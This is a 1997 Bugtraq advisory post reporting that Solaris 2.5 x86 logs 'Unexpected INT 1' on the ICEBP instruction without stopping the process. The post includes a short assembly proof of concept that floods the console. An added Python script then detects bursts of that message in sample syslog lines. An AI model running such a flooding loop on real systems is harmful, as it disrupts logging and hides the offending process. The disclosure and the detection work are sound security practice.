[5623] in bugtraq


Solaris x86 & ICEBP

daemon@ATHENA.MIT.EDU (Solar Designer)
Sat Nov 15 21:12:15 1997

Date: 	Sun, 16 Nov 1997 03:25:20 -0300
Reply-To: Solar Designer <solar@FALSE.COM>
From: Solar Designer <solar@FALSE.COM>
To: BUGTRAQ@NETSPACE.ORG

Hello,

This Pentium bug workaround discussion reminded me of a minor Solaris x86
bug I found half a year ago (tested on Solaris 2.5).

When a program executes the originally undocumented ICEBP instruction, the
kernel reports an 'Unexpected INT 1', and the program continues running.
With default syslogd configuration, this allows flooding the console, and
no information about which process is doing this is reported.

Here's the exploit (put in a .s file):

.globl main
main:
.byte 0xf1
jmp main

Signed,
Solar Designer

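A detection-side illustration of the flood described above, added here and not part of the post: a sliding-window burst detector run over constructed Solaris-style syslog lines carrying the "Unexpected INT 1" message. The log format and the hostname are assumptions; note that the kernel message carries no PID, so the detector can only report the burst, not which process caused it.

```python
import re
from collections import deque
from datetime import datetime

# Constructed sample console/syslog lines (assumed format, not from the post).
SAMPLE_LOG = """\
Nov 16 03:25:20 host unix: Unexpected INT 1
Nov 16 03:25:20 host unix: Unexpected INT 1
Nov 16 03:25:20 host unix: Unexpected INT 1
Nov 16 03:25:21 host unix: Unexpected INT 1
Nov 16 03:25:30 host sendmail[123]: accepted connection
Nov 16 03:26:05 host unix: Unexpected INT 1
"""

LINE_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ (\S+?): (.*)$")
PATTERN = "Unexpected INT 1"


def parse(line, year=1997):
    """Split a syslog line into (timestamp, source, message); None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, m.group(2), m.group(3)


def find_bursts(log_text, threshold=3, window_s=5):
    """Return (timestamp, count) for each burst in which the number of
    'Unexpected INT 1' messages within the trailing window reaches threshold.
    The kernel source ('unix') has no PID, so attribution is not possible here."""
    window = deque()
    alerts = []
    for line in log_text.splitlines():
        parsed = parse(line)
        if parsed is None:
            continue
        ts, _src, msg = parsed
        if PATTERN not in msg:
            continue
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_s:
            window.popleft()
        if len(window) == threshold:  # fire once per burst, when it first crosses
            alerts.append((ts, len(window)))
    return alerts


if __name__ == "__main__":
    for ts, n in find_bursts(SAMPLE_LOG):
        print(f"{ts.isoformat()}: {n} '{PATTERN}' messages in a {5}s window")
```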